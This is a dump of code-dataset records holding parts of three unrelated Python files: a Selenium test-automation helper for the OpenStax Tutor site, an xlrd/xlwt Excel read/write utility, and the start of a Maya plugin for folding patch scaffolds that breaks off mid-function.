finally:\n                options[randint(0, len(options) - 1)].click()\n                self.page.wait_for_page_load()\n        # How many questions are there? (default = 5)\n        breadbox = self.wait.until(\n            expect.presence_of_element_located(\n                (By.CLASS_NAME, 'task-breadcrumbs')\n            )\n        )\n        crumbs = breadbox.find_elements(By.TAG_NAME, 'span')\n        # Answer each assessment\n        for _ in repeat(None, len(crumbs) - 1):\n            self.answer_assessment()\n        # Finish the practice\n        self.wait.until(\n            expect.element_to_be_clickable(\n                (By.XPATH, '//a[contains(text(),\"Dashboard\") and' +\n                 ' contains(@class,\"btn\")]')\n            )\n        ).click()\n        self.page.wait_for_page_load()\n\n    def answer_assessment(self):\n        \"\"\"Answer a Tutor assessment.\"\"\"\n        self.wait.until(\n            expect.presence_of_element_located(\n                (By.CLASS_NAME, 'openstax-question')\n            )\n        )\n        text = chomsky(1, 500)\n        wt = self.wait_time\n        try:\n            self.change_wait_time(3)\n            text_block = self.find(By.XPATH, '//textarea')\n            self.change_wait_time(wt)\n            print('Enter free response')\n            Assignment.send_keys(self.driver, text_block, text)\n            self.find(By.CLASS_NAME, 'continue').click()\n        except Exception:\n            self.change_wait_time(wt)\n            print('Skip free response')\n        finally:\n            self.page.wait_for_page_load()\n        answers = self.find_all(By.CLASS_NAME, 'answer-letter')\n        self.sleep(0.8)\n        rand = randint(0, len(answers) - 1)\n        answer = chr(ord('a') + rand)\n        print('Selecting %s' % answer)\n        self.scroll_to(answers[0])\n        if answer == 'a':\n            self.driver.execute_script('window.scrollBy(0, -160);')\n        elif answer == 'd':\n            self.driver.execute_script('window.scrollBy(0, 160);')\n        answers[rand].click()\n        self.sleep(1.0)\n        self.wait.until(\n            expect.element_to_be_clickable(\n                (By.XPATH, '//button[span[text()=\"Submit\"]]')\n            )\n        ).click()\n        self.wait.until(\n            expect.element_to_be_clickable(\n                (By.CLASS_NAME, 'continue')\n            )\n        ).click()\n        self.page.wait_for_page_load()\n\n\nclass Admin(User):\n    \"\"\"User extension for administrators.\"\"\"\n\n    CONDENSED_WIDTH = User.CONDENSED_WIDTH\n    DEFAULT_WAIT_TIME = User.DEFAULT_WAIT_TIME\n\n    def __init__(self, use_env_vars=False, existing_driver=None,\n                 driver_type='chrome', **kwargs):\n        \"\"\"Administrator initialization 
with User pass-through.\"\"\"\n if use_env_vars:\n if not kwargs:\n kwargs = {}\n kwargs['username'] = os.getenv('ADMIN_USER')\n kwargs['password'] = os.getenv('ADMIN_PASSWORD')\n kwargs['site'] = os.getenv('SERVER_URL')\n kwargs['email'] = os.getenv('TEST_EMAIL_ACCOUNT')\n kwargs['email_username'] = os.getenv('TEST_EMAIL_USER')\n kwargs['email_password'] = os.getenv('TEST_EMAIL_PASSWORD')\n super(Admin, self).__init__(existing_driver=existing_driver,\n driver_type=driver_type,\n **kwargs)\n extension = '' if self.url.endswith('/') else '/'\n self.base = self.url + extension + 'admin'\n\n def goto_admin_control(self):\n \"\"\"Access the administrator controls.\"\"\"\n self.get('%s' % self.base)\n\n def goto_catalog_offerings(self):\n \"\"\"Access the catalog.\"\"\"\n self.get('%s%s' % (self.base, '/catalog_offerings'))\n\n def goto_course_list(self):\n \"\"\"Access the course list.\"\"\"\n self.get('%s%s' % (self.base, '/courses'))\n\n def goto_school_list(self):\n \"\"\"Access the school list.\"\"\"\n self.get('%s%s' % (self.base, '/school'))\n\n def goto_district_list(self):\n \"\"\"Access the district list.\"\"\"\n self.get('%s%s' % (self.base, '/districts'))\n\n def goto_tag_list(self):\n \"\"\"Access the tag list.\"\"\"\n self.get('%s%s' % (self.base, '/tags'))\n\n def goto_ecosystems(self):\n \"\"\"Access the ecosystem list.\"\"\"\n self.get('%s%s' % (self.base, '/ecosystems'))\n\n def goto_terms_and_contracts(self):\n \"\"\"Access the terms and contracts list.\"\"\"\n self.get('%s%s' % (self.url, '/fine_print'))\n\n def goto_contracts(self):\n \"\"\"Access the targeted contracts.\"\"\"\n self.get('%s%s' % (self.base, '/targeted_contracts'))\n\n def goto_course_stats(self):\n \"\"\"Access the course stats.\"\"\"\n self.get('%s%s' % (self.base, '/stats/courses'))\n\n def goto_concept_coach_stats(self):\n \"\"\"Access the Concept Coach stats.\"\"\"\n self.get('%s%s' % (self.base, '/stats/concept_coach'))\n\n def goto_user_list(self):\n \"\"\"Access the user list.\"\"\"\n self.get('%s%s' % (self.base, '/users'))\n\n def goto_jobs(self):\n \"\"\"Access the jobs list.\"\"\"\n self.get('%s%s' % (self.base, '/jobs'))\n\n def goto_research_data(self):\n \"\"\"Access the researcher data.\"\"\"\n self.get('%s%s' % (self.base, '/research_data'))\n\n def goto_salesforce_control(self):\n \"\"\"Access the Salesforce controls.\"\"\"\n self.get('%s%s' % (self.base, '/salesforce'))\n\n def goto_system_settings(self):\n \"\"\"Access the system settings.\"\"\"\n self.get('%s%s' % (self.base, '/settings'))\n\n def goto_system_notifications(self):\n \"\"\"Access the system notifications.\"\"\"\n self.get('%s%s' % (self.base, '/notifications'))\n\n\nclass ContentQA(User):\n \"\"\"User extention for content users.\"\"\"\n\n CONDENSED_WIDTH = User.CONDENSED_WIDTH\n DEFAULT_WAIT_TIME = User.DEFAULT_WAIT_TIME\n\n def __init__(self, use_env_vars=False, existing_driver=None,\n driver_type='chrome', **kwargs):\n \"\"\"Content analyst initialization with User pass-through.\"\"\"\n if use_env_vars:\n if not kwargs:\n kwargs = {}\n kwargs['username'] = os.getenv('CONTENT_USER')\n kwargs['password'] = os.getenv('CONTENT_PASSWORD')\n kwargs['site'] = os.getenv('SERVER_URL')\n kwargs['email'] = os.getenv('TEST_EMAIL_ACCOUNT')\n kwargs['email_username'] = os.getenv('TEST_EMAIL_USER')\n kwargs['email_password'] = os.getenv('TEST_EMAIL_PASSWORD')\n super(ContentQA, self).__init__(existing_driver=existing_driver,\n driver_type=driver_type,\n **kwargs)\n\n\nclass Webview(Helper):\n \"\"\"Webview navigation and 
control.\"\"\"\n\n CONDENSED_WIDTH = Helper.CONDENSED_WIDTH\n DEFAULT_WAIT_TIME = Helper.DEFAULT_WAIT_TIME\n\n def __init__(self,\n driver_type='chrome',\n capabilities=None,\n pasta_user=None,\n wait_time=DEFAULT_WAIT_TIME,\n remote_driver='',\n existing_driver=None,\n **kwargs):\n \"\"\"Webview constructor.\"\"\"\n self.course_dates = (None, None)\n super(Webview, self).__init__(driver_type=driver_type,\n capabilities=capabilities,\n pasta_user=pasta_user,\n wait_time=wait_time,\n existing_driver=existing_driver,\n **kwargs)\n\n def goto_section(self, section_name=None, section_number=None):\n \"\"\"Go to a specific page module.\"\"\"\n raise NotImplementedError(inspect.currentframe().f_code.co_name)\n\n def next(self):\n \"\"\"Go to the next page module.\"\"\"\n raise NotImplementedError(inspect.currentframe().f_code.co_name)\n\n def previous(self):\n \"\"\"Go to the previous page module.\"\"\"\n raise NotImplementedError(inspect.currentframe().f_code.co_name)\n\n\nclass CourseSelectionError(Exception):\n \"\"\"Course selection failure exception.\"\"\"\n\n def __init__(self, msg='', err=None):\n \"\"\"Exception initializer.\"\"\"\n self.msg = msg\n self.__traceback__ = err\n\n def __repr__(self):\n \"\"\"Return __str__ print.\"\"\"\n return self.__str__()\n\n def __str__(self):\n \"\"\"String representation of the exception.\"\"\"\n try:\n return str(self.msg).join(str(self.__traceback__))\n except Exception as e:\n return str(type(e)).join(str(e))\n\n\nclass LoginError(Exception):\n \"\"\"Login error exception.\"\"\"\n\n def __init__(self, msg='', err=None):\n \"\"\"Exception initializer.\"\"\"\n self.msg = msg\n self.__traceback__ = err\n\n def __repr__(self):\n \"\"\"Return __str__ print.\"\"\"\n return self.__str__()\n\n def __str__(self):\n \"\"\"String representation of the exception.\"\"\"\n try:\n return str(self.msg).join(str(self.__traceback__))\n except Exception as e:\n return str(type(e)).join(str(e))\n\n\nclass WebDriverTypeException(WebDriverException):\n \"\"\"Exception for unknown WebDriver types.\"\"\"\n\n def __init__(self, msg='', err=None):\n \"\"\"Exception initializer.\"\"\"\n self.msg = msg\n self.__traceback__ = err\n\n def __repr__(self):\n \"\"\"Return __str__ print.\"\"\"\n return self.__str__()\n\n def __str__(self):\n \"\"\"String representation of the exception.\"\"\"\n try:\n return str(self.msg).join(str(self.__traceback__))\n except Exception as e:\n return str(type(e)).join(str(e))\n\n\nif __name__ == '__main__': # pragma: no cover\n # execute if run as a script\n initialization = Helper\n","repo_name":"openstax/staxing","sub_path":"staxing/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":48450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27703892360","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : Excel_utils.py\n# @Author: huifer\n# @Date : 2018-3-9\nimport xlrd\nimport xlwt\n\n\ndef read_excel(path, index=None, sheet_name=None, row=None, col=None):\n \"\"\"\n index sheet_name 选一个\n :param path: str\n :param index: int\n :param sheet_name: str\n :param row: int\n :param col: int\n :return:dict()\n \"\"\"\n workbook = xlrd.open_workbook(path)\n # 获取所有sheet\n get_sheet = workbook.sheet_names()\n if index is not None:\n # 索引获取方式\n try:\n sheet1 = workbook.sheet_by_index(index)\n except Exception as e:\n return e\n else:\n if row is not None:\n rows = sheet1.row_values(row)\n else:\n rows = []\n if col is not None:\n cols = sheet1.col_values(col)\n 
else:\n                cols = []\n            if row is not None and col is not None:\n                val = sheet1.cell(row, col).value\n            else:\n                val = None\n            return {\n                'rows': rows,\n                'cols': cols,\n                'val': val}\n    elif sheet_name:\n        # Access the sheet by name\n        try:\n            sheet1 = workbook.sheet_by_name(sheet_name)\n        except Exception as e:\n            return e\n        else:\n            if row is not None:\n                rows = sheet1.row_values(row)\n            else:\n                rows = []\n            if col is not None:\n                cols = sheet1.col_values(col)\n            else:\n                cols = []\n            if row is not None and col is not None:\n                val = sheet1.cell(row, col).value\n            else:\n                val = None\n            return {\n                'rows': rows,\n                'cols': cols,\n                'val': val}\n\n    \"\"\"\n    # Get the contents of all merged cells\n    merge = []\n    for (rlow, rhigh, clow, chigh) in sheet2.merged_cells:\n        merge.append([rlow, clow])\n    for index in merge:\n        print(sheet2.cell_value(index[0], index[1]))\n    \"\"\"\n\n\ndef excel_style(name, height, bold=False):\n    \"\"\"Create an xlwt font style.\n\n    :param name: str font name\n    :param height: int font height\n    :param bold: bool whether the font is bold\n    :return: xlwt.XFStyle()\n    \"\"\"\n    style = xlwt.XFStyle()\n    font = xlwt.Font()\n    font.name = name\n    font.bold = bold\n    font.colour_index = 0\n    font.height = height\n    style.font = font\n    return style\n\n\ndef write_row_excel(path, sheet_name=None, row_context=None, row=None):\n    \"\"\"\n    Write the content row by row\n    :param path: str\n    :param sheet_name: str\n    :param row_context:[[],[]...]\n    :param row:int\n    :return: True on success or the error\n    \"\"\"\n    if sheet_name is not None and row_context is not None and row is not None:\n        f = xlwt.Workbook()\n        sheet1 = f.add_sheet(sheet_name, cell_overwrite_ok=True)\n        for x in row_context:\n            for i in range(len(x)):\n                sheet1.write(row, i, x[i], excel_style(\"微软雅黑\", 220, True))\n\n            row += 1\n        try:\n            f.save(path)\n        except Exception as e:\n            return e\n        else:\n            return True\n    else:\n        return \"invalid arguments\"\n\n\ndef write_col_excel(path, sheet_name=None, col_context=None, col=None):\n    \"\"\"\n    Write the content column by column\n    :param path: str\n    :param sheet_name:str\n    :param col_context:[[],[]...]\n    :param col:int\n    :return: True on success or the error\n    \"\"\"\n    if sheet_name is not None and col_context is not None and col is not None:\n        f = xlwt.Workbook()\n        sheet1 = f.add_sheet(sheet_name, cell_overwrite_ok=True)\n        for x in col_context:\n            for i in range(len(x)):\n                sheet1.write(i, col, x[i], excel_style(\"微软雅黑\", 220, True))\n            col += 1\n        try:\n            f.save(path)\n        except Exception as e:\n            return e\n        else:\n            return True\n    else:\n        return \"invalid arguments\"\n\n\nif __name__ == '__main__':\n    test1 = read_excel(r\"read_test.xlsx\", index=0, row=2, col=1)\n    print(test1)\n    test2 = write_row_excel(\n        path=\"123.xls\",\n        sheet_name=\"tt1\",\n        row_context=[['a', 'b', 'c'], ['aa', 'bb', 'cc'], ['aaa', 'bbb', 'ccc']],\n        row=0,\n    )\n    print(test2)\n    test3 = write_col_excel(\n        path='456.xls',\n        sheet_name=\"tt2\",\n        col_context=[['a', 1, 2, 3], ['b', 11, 22, 33], ['c', 111, 222, 333]],\n        col=0\n    )\n    print(test3)\n","repo_name":"huifer/Automated_Framework","sub_path":"unity/Excel_utils.py","file_name":"Excel_utils.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"38836946851","text":"import os\r\nimport sys\r\nimport random\r\nimport math\r\n\r\nimport maya.OpenMaya as OpenMaya\r\nimport maya.OpenMayaAnim as OpenMayaAnim\r\nimport maya.OpenMayaMPx as OpenMayaMPx\r\nimport maya.cmds as cmds\r\nimport foldMain as fold\r\nimport numpy as np\r\nfrom typing import Dict, List, Set\r\n\r\n\r\n# Useful functions for declaring attributes as inputs or outputs.\r\ndef MAKE_INPUT(attr):\r\n    attr.setKeyable(True)\r\n    attr.setStorable(True)\r\n    
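# Input attributes remain readable and writable so they can be connected\r\n    # and queried in the dependency graph; MAKE_OUTPUT below leaves outputs\r\n    # read-only.\r\n    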
attr.setReadable(True)\r\n attr.setWritable(True)\r\n\r\n\r\ndef MAKE_OUTPUT(attr):\r\n attr.setKeyable(False)\r\n attr.setStorable(False)\r\n attr.setReadable(True)\r\n attr.setWritable(False)\r\n\r\n\r\n# Define the name of the node\r\nkPluginNodeTypeName = \"foldableNode\"\r\n\r\n# Give the node a unique ID. Make sure this ID is different from all of your\r\n# other nodes!\r\nfoldableNodeId = OpenMaya.MTypeId(0x8709)\r\n\r\n\r\n# Static helper functions\r\ndef getObjectTransformFromDag(name: str) -> OpenMaya.MFnTransform:\r\n selection_list = OpenMaya.MSelectionList()\r\n selection_list.add(name)\r\n transform_dag_path = OpenMaya.MDagPath()\r\n status = selection_list.getDagPath(0, transform_dag_path)\r\n return OpenMaya.MFnTransform(transform_dag_path)\r\n\r\n\r\ndef getObjectObjectFromDag(name: str) -> OpenMaya.MDagPath:\r\n # Create an MSelectionList object to store the plane name\r\n selection_list = OpenMaya.MSelectionList()\r\n selection_list.add(name)\r\n transform_dag_path = OpenMaya.MDagPath()\r\n status = selection_list.getDagPath(0, transform_dag_path)\r\n\r\n print(\"returning transform dag path..\")\r\n return transform_dag_path\r\n\r\n\r\ndef setUpVertBasicScene():\r\n print(\"setUpVertScene: BASIC\")\r\n pFold = getObjectTransformFromDag(\"pFoldH\")\r\n pBaseTop = getObjectTransformFromDag(\"pBaseTopH\")\r\n pBaseBottom = getObjectTransformFromDag(\"pBaseBottomH\")\r\n\r\n # Set the translation for pBottom to 0, 0, 0 and pTop to 0, 1, 0.\r\n pFold.setTranslation(OpenMaya.MVector(0, 0.5, 5), OpenMaya.MSpace.kWorld)\r\n pBaseTop.setTranslation(OpenMaya.MVector(0, 1, 5), OpenMaya.MSpace.kWorld)\r\n pBaseBottom.setTranslation(OpenMaya.MVector(0, 0, 5), OpenMaya.MSpace.kWorld)\r\n\r\n # # Set the rotation for both to 0, 0, -90. Keep in mind that EulerRotation is in radians.\r\n pFold.setRotation(OpenMaya.MEulerRotation(0, 0, math.radians(-90)))\r\n pBaseTop.setRotation(OpenMaya.MEulerRotation(0, 0, 0))\r\n pBaseBottom.setRotation(OpenMaya.MEulerRotation(0, 0, 0))\r\n\r\n\r\n# Returns a dictionary of names and positions in world space.\r\ndef getObjectVerticeNamesAndPositions(name: str) -> Dict[str, List[float]]:\r\n # TODO: There are probably better ways by getting the vertex iterator.\r\n vertex_count = cmds.polyEvaluate(name, vertex=True)\r\n vertices = {}\r\n for i in range(vertex_count):\r\n vertex_name = \"{}.vtx[{}]\".format(name, i)\r\n\r\n vertex_translation = cmds.pointPosition(vertex_name, world=True)\r\n vertices[vertex_name] = vertex_translation\r\n\r\n return vertices\r\n\r\n\r\n# Write a function that for a list of vertices, returns the closest n vertices to a given point p.\r\n# The function should return a list of triplet (vertex_name, distance, vertex_position).\r\n# The list should be sorted by distance from p.\r\ndef getClosestVertices(vertices: dict, p: OpenMaya.MVector, n: int) -> list:\r\n # Iterate through the vertices and calculate the distance from p.\r\n # Store the distance and vertex name in a list.\r\n # Sort the list by distance.\r\n # Return the first n elements of the list.\r\n distList = []\r\n for vertex_name, vertex_position in vertices.items():\r\n vertexPoint = OpenMaya.MVector(vertex_position[0], vertex_position[1], vertex_position[2])\r\n dist = OpenMaya.MVector(p - vertexPoint).length()\r\n distList.append((vertex_name, dist, vertexPoint))\r\n\r\n distList.sort(key=lambda x: x[1])\r\n return distList[:n]\r\n\r\n\r\ndef checkScaffoldConnection(pivot: OpenMaya.MVector, middlepoint: OpenMaya.MVector):\r\n dist = OpenMaya.MVector(pivot - 
middlepoint).length()\r\n print(\"Pivot distance to middle point: {:.6f}\".format(dist))\r\n if dist > 0.0001:\r\n print(\"Error: Distance is not 0. Patches are not connected\")\r\n exit(1)\r\n\r\n\r\n# Need to keep this function because it is a special condition that Idk how to fix yet\r\ndef checkScaffoldConnectionTopBase(parent, childPatch: str):\r\n childVertices = getObjectVerticeNamesAndPositions(childPatch)\r\n\r\n # Get child's global Y position\r\n # TODO: make this more generic in the future\r\n childY = float(childVertices[\"{}.vtx[0]\".format(childPatch)][1])\r\n\r\n # Get child's max x and min x\r\n childMaxX = max(childVertices.values(), key=lambda x: x[0])[0]\r\n childMinX = min(childVertices.values(), key=lambda x: x[0])[0]\r\n\r\n # Get child's max z and min z\r\n childMaxZ = max(childVertices.values(), key=lambda x: x[2])[2]\r\n childMinZ = min(childVertices.values(), key=lambda x: x[2])[2]\r\n\r\n # check if both of the parent's vertices are within the child's bounding box\r\n connected = True\r\n for element in parent:\r\n vertex = element[2]\r\n print(\"vertex: {:.6f}, {:.6f}, {:.6f}\".format(vertex[0], vertex[1], vertex[2]))\r\n if abs(vertex[1] - childY) > 0.0001:\r\n print(\"Y values are not the same!\")\r\n print(\"Parent Y: {}\".format(vertex[1]))\r\n print(\"Child Y: {}\".format(childY))\r\n connected = False\r\n break\r\n if vertex[0] < childMinX:\r\n print(\"X value is less than minX\")\r\n connected = False\r\n break\r\n if vertex[0] > childMaxX:\r\n print(\"X value is larger than maxX\")\r\n connected = False\r\n break\r\n if vertex[2] < childMinZ:\r\n print(\"Z value is smaller childMinZ\")\r\n connected = False\r\n break\r\n if vertex[2] > childMaxZ:\r\n print(\"Z value is larger than childMaxZ\")\r\n connected = False\r\n break\r\n\r\n if not connected:\r\n print(\"Error TOPBASE: Patches are not connected\")\r\n exit(1)\r\n\r\n\r\ndef checkScaffoldConnectionBaseNoErr(base: str, foldable) -> bool:\r\n print(\"CHECKING SCAFFOLD CONNECTION BASE...\")\r\n baseVertices = getObjectVerticeNamesAndPositions(base)\r\n\r\n # Get child's global Y position\r\n # TODO: make this more generic in the future\r\n baseY = float(baseVertices[\"{}.vtx[0]\".format(base)][1])\r\n\r\n # Get child's max x and min x\r\n baseMaxX = max(baseVertices.values(), key=lambda x: x[0])[0]\r\n baseMinX = min(baseVertices.values(), key=lambda x: x[0])[0]\r\n\r\n # Get child's max z and min z\r\n baseMaxZ = max(baseVertices.values(), key=lambda x: x[2])[2]\r\n baseMinZ = min(baseVertices.values(), key=lambda x: x[2])[2]\r\n\r\n # check if both of the parent's vertices are within the child's bounding box\r\n connected = True\r\n for element in foldable:\r\n vertex = element[2]\r\n print(\"verices in foldable closest to base: {:.6f}, {:.6f}, {:.6f}\".format(vertex[0], vertex[1], vertex[2]))\r\n if abs(vertex[1] - baseY) > 0.0001:\r\n print(\"Y values are not the same!\")\r\n print(\"Parent Y: {}\".format(vertex[1]))\r\n print(\"Child Y: {}\".format(baseY))\r\n connected = False\r\n break\r\n if vertex[0] < baseMinX:\r\n print(\"X value is less than minX\")\r\n connected = False\r\n break\r\n if vertex[0] > baseMaxX:\r\n print(\"X value is larger than maxX\")\r\n connected = False\r\n break\r\n if vertex[2] < baseMinZ:\r\n print(\"Z value is smaller childMinZ\")\r\n connected = False\r\n break\r\n if vertex[2] > baseMaxZ:\r\n print(\"Z value is larger than childMaxZ\")\r\n connected = False\r\n break\r\n\r\n return connected\r\n\r\n\r\ndef isPolyPlane(obj):\r\n # Create an MSelectionList 
object\r\n transformDagPath = getObjectObjectFromDag(obj)\r\n\r\n # Get the shape node\r\n print(\"Getting shape node\")\r\n transformDagPath.extendToShape()\r\n\r\n print(\"Checking if shape node is of type mesh\")\r\n # Check if the shape node is of type \"mesh\"\r\n if transformDagPath.node().hasFn(OpenMaya.MFn.kMesh):\r\n print(\"creating mesh\")\r\n # Create an MFnMesh function set\r\n fnMesh = OpenMaya.MFnMesh(transformDagPath)\r\n\r\n # Get the number of faces in the mesh\r\n numFaces = fnMesh.numPolygons()\r\n\r\n # If the mesh has only one face, it can be considered a polygonal plane\r\n if numFaces == 1:\r\n return True\r\n return False\r\n\r\n\r\nclass MayaHBasicScaffoldWrapper():\r\n\r\n def __init__(self, basePatch: str, patches: List[str], pushAxis: OpenMaya.MVector, maxHinges: int, shrinks: int):\r\n self.basePatch = basePatch\r\n self.patches = patches\r\n\r\n # TODO: hard coded for now but make it dynamic later\r\n # Get the scaleX of patches[0]\r\n self.origFoldPatchHeight = cmds.getAttr(\"{}.scaleX\".format(patches[0]))\r\n\r\n self.pushAxis = pushAxis\r\n\r\n self.maxHinges = maxHinges\r\n self.shrinks = shrinks\r\n\r\n self.newShapes = []\r\n\r\n self.inInitialPatches = []\r\n self.shapeTraverseOrder: List[str] = []\r\n self.shapeBase = []\r\n self.shapeResetTransforms = {}\r\n\r\n '''\r\n Basic scaffold peek:\r\n - basePatches: the base patch\r\n - foldablePatch: foldable patch\r\n - foldOption: list of fold solutions\r\n - foldTransform: \r\n - startAngles\r\n - endAngles\r\n - startTime\r\n - endTime\r\n - Modifcation\r\n - isLeft\r\n - rotationalAxis\r\n\r\n '''\r\n self.basicScaffold: fold.HBasicScaff = None\r\n\r\n # TODO: for now, use FoldManager instead of basicScaffold to output hard coded results\r\n # self.foldManager: fold.FoldManager = None\r\n # self.foldManagerOption: fold.FoldOption = None\r\n\r\n def getBasePatch(self) -> str:\r\n return self.basePatch\r\n\r\n # TODO: Test moving it to inputScaffold\r\n def getPatches(self) -> List[str]:\r\n return self.patches\r\n\r\n def getPatchesIncludeBase(self) -> List[str]:\r\n patches = [self.basePatch]\r\n patches.extend(self.patches)\r\n return patches\r\n\r\n # TODO: why is this a list list list?\r\n def getAllPatchVertices(self) -> List[List[List[float]]]:\r\n # For each element in self.getPatchesIncludeBase, call getObjectVerticeNamesAndPositions\r\n shapeVertices = []\r\n for patch in self.getPatchesIncludeBase():\r\n vertices = getObjectVerticeNamesAndPositions(patch)\r\n shapeVertices.append(list(vertices.values()))\r\n\r\n return shapeVertices\r\n\r\n def cleanUpSplitPatches(self):\r\n print(\"cleaning up split patches...\")\r\n for i in range(0, len(self.newShapes)):\r\n cmds.delete(self.newShapes[i])\r\n\r\n # Clear the new shapes list.\r\n self.newShapes = []\r\n\r\n def setUpGenericScene(self, upperPatches: List[str], basePatch: str):\r\n print(\"Setting up Generic scene...\")\r\n # TODO: theoretically we should only need to move things in the upper patches\r\n # Get the transforms for each item in upper patches\r\n transforms = []\r\n for patch in upperPatches:\r\n transforms.append(getObjectTransformFromDag(patch))\r\n\r\n original_transforms = self.shapeResetTransforms\r\n\r\n # Set the translation for each of the patches to the original translations\r\n for i in range(0, len(upperPatches)):\r\n patch_name = upperPatches[i]\r\n original_translate = original_transforms[patch_name][0]\r\n translate_vec = OpenMaya.MVector(original_translate[0], original_translate[1], original_translate[2])\r\n 
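# The translation snapshot was taken in world space, so restore it with\r\n            # MSpace.kWorld here; the rotation snapshot is reapplied below through\r\n            # cmds.setAttr on the .rotate attribute.\r\n            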
transforms[i].setTranslation(translate_vec, OpenMaya.MSpace.kWorld)\r\n\r\n # Set the rotation for each of the patches to the original rotations\r\n for i in range(0, len(transforms)):\r\n patch_name = upperPatches[i]\r\n original_rotate = original_transforms[patch_name][1]\r\n cmds.setAttr(patch_name + \".rotate\", original_rotate[0][0], original_rotate[0][1], original_rotate[0][2])\r\n\r\n def restoreInitialState(self):\r\n # Sets the shapeTraverseOrder to the original scaff's patches\r\n # Sets\r\n print(\"Restoring Initial State...\")\r\n self.shapeTraverseOrder = self.getPatches()\r\n\r\n # Clears self.shapeResetTransforms\r\n self.shapeResetTransforms = {}\r\n\r\n # fill new_translation and new_rotation with original values\r\n for shape in self.shapeTraverseOrder:\r\n transform = getObjectTransformFromDag(shape)\r\n translate = transform.translation(OpenMaya.MSpace.kWorld)\r\n rotate = cmds.getAttr(shape + \".rotate\")\r\n\r\n # Reset self.shapeResetTransforms\r\n self.shapeResetTransforms[shape] = [translate, rotate]\r\n\r\n # Reset back to original shapes so you can break them again\r\n self.cleanUpSplitPatches()\r\n\r\n def shrinkPatch(self, shapeTraverseOrder, endPiece, numPieces, startPiece):\r\n print(\"shrinking patches...\")\r\n for i in range(0, len(shapeTraverseOrder) - 1):\r\n foldable_patch = shapeTraverseOrder[i]\r\n middle = 1 / 2 # hard coded for now\r\n\r\n # Translate patch to the new midpoint\r\n pieceWidth = 1.0 / numPieces # hard coded for now\r\n newMiddle = (startPiece + endPiece) * pieceWidth / 2\r\n\r\n print(\"newMiddle in Z direction: {}\".format(newMiddle))\r\n transform = getObjectTransformFromDag(foldable_patch)\r\n translation = OpenMaya.MVector(0, 0, newMiddle) - OpenMaya.MVector(0, 0, middle)\r\n print(\"translation: {}\".format(translation))\r\n transform.translateBy(translation, OpenMaya.MSpace.kTransform)\r\n\r\n # Shrink patch by numPieces in the hard coded z direction\r\n transform = getObjectTransformFromDag(foldable_patch)\r\n shrinkFactor = (endPiece - startPiece) / numPieces\r\n cmds.setAttr(foldable_patch + \".scaleZ\", shrinkFactor)\r\n\r\n def generateNewPatches(self, originalPatch: str, numHinges: int) -> (List[str], List[List[List[float]]]):\r\n # Compute the new patch scale values based on original_patch's scale and num_patches\r\n # TODO: Hard coded for split in the x Direction, but need to be more general later on.\r\n numPatches = numHinges + 1\r\n originalScaleX = cmds.getAttr(originalPatch + \".scaleX\")\r\n originalScaleZ = cmds.getAttr(originalPatch + \".scaleZ\")\r\n\r\n newPatchScale = originalScaleX / numPatches\r\n\r\n # Generate new patches.\r\n newPatches = []\r\n for i in range(0, numPatches):\r\n # TODO: Based on the axis we shrink, either width or height will be the original patch's scale\r\n # This command generates a new polyplane in the scene\r\n newPatch = cmds.polyPlane(name=originalPatch + \"_\" + str(i), width=newPatchScale, height=originalScaleZ,\r\n subdivisionsX=1,\r\n subdivisionsY=1)\r\n newPatches.append(newPatch[0])\r\n\r\n # Rotate the new patches with the same rotation as the original_patch\r\n originalRotation = cmds.getAttr(originalPatch + \".rotate\")\r\n for i in range(0, len(newPatches)):\r\n cmds.setAttr(newPatches[i] + \".rotate\", originalRotation[0][0], originalRotation[0][1],\r\n originalRotation[0][2])\r\n\r\n # Translate the patches along the direction it has been scaled in (but that is local)\r\n # TODO: Axis of scaling is hard coded\r\n originalTranslation = cmds.getAttr(originalPatch + 
\".translate\")\r\n\r\n # Get the world location of the bottom of the original patch\r\n # TODO: hard coded for the Y direction\r\n originalPatchBottom = originalTranslation[0][1] - originalScaleX * 0.5\r\n newPatchPositions = []\r\n newTransforms = []\r\n for i in range(0, len(newPatches)):\r\n newTranslate = [originalTranslation[0][0], originalPatchBottom + newPatchScale * (i + 0.5),\r\n originalTranslation[0][2]]\r\n newPatchPositions.append(newTranslate)\r\n cmds.setAttr(newPatches[i] + \".translate\", newTranslate[0], newTranslate[1], newTranslate[2])\r\n\r\n # Append new patch transform to list of new transforms\r\n # Which will be used for its scene reset at the beginning\r\n # TODO: why is this a tuple with the name in the first spot?\r\n newTransforms.append([newTranslate, originalRotation])\r\n\r\n # Pivot the patches.\r\n for i in range(0, len(newPatches)):\r\n # Set the pivot location to the bottom of the patch\r\n newPivot = [newPatchScale * 0.5, 0, 0]\r\n transform = getObjectTransformFromDag(newPatches[i])\r\n transform.setRotatePivot(OpenMaya.MPoint(newPivot[0], newPivot[1], newPivot[2]), OpenMaya.MSpace.kTransform,\r\n True)\r\n\r\n newPatches.reverse()\r\n newTransforms.reverse()\r\n\r\n return newPatches, newTransforms\r\n\r\n def breakPatches(self, shapeTraverseOrder: List[str], numHinges: int):\r\n\r\n # Render the original foldable patch invisible\r\n # Take every guy except the last guy and hide it\r\n # TODO: now, i know that since this is a basic patch, there should only ever be one of these guys.\r\n foldablePatches = self.patches[:-1]\r\n for patch in foldablePatches:\r\n cmds.setAttr(patch + \".visibility\", False)\r\n\r\n print(\"break patches called\")\r\n for j in range(0, len(shapeTraverseOrder) - 1): # every patch except last guy is foldable\r\n foldablePatch = shapeTraverseOrder[\r\n j] # TODO: make more generic, currently assumes foldable patch is at the center\r\n\r\n shapeTraverseOrder.remove(foldablePatch)\r\n del self.shapeResetTransforms[foldablePatch]\r\n\r\n newPatches, newTransforms = self.generateNewPatches(foldablePatch, numHinges)\r\n\r\n # Add the new patch transforms to the shape_reset_transforms and insert new patches to shape_traverse_order\r\n for i in range(0, len(newPatches)):\r\n shapeTraverseOrder.insert(j, newPatches[i])\r\n self.shapeResetTransforms[newPatches[i]] = [newTransforms[i][0], newTransforms[i][1]]\r\n\r\n # Keep track of the new patches just created so we can delete it on the next iteration\r\n self.newShapes.append(newPatches[i])\r\n\r\n def getPatchPivots(self, shapeTraverseOrder: List[str]) -> List[OpenMaya.MPoint]:\r\n patchPivots = []\r\n for shape in shapeTraverseOrder:\r\n pivot = 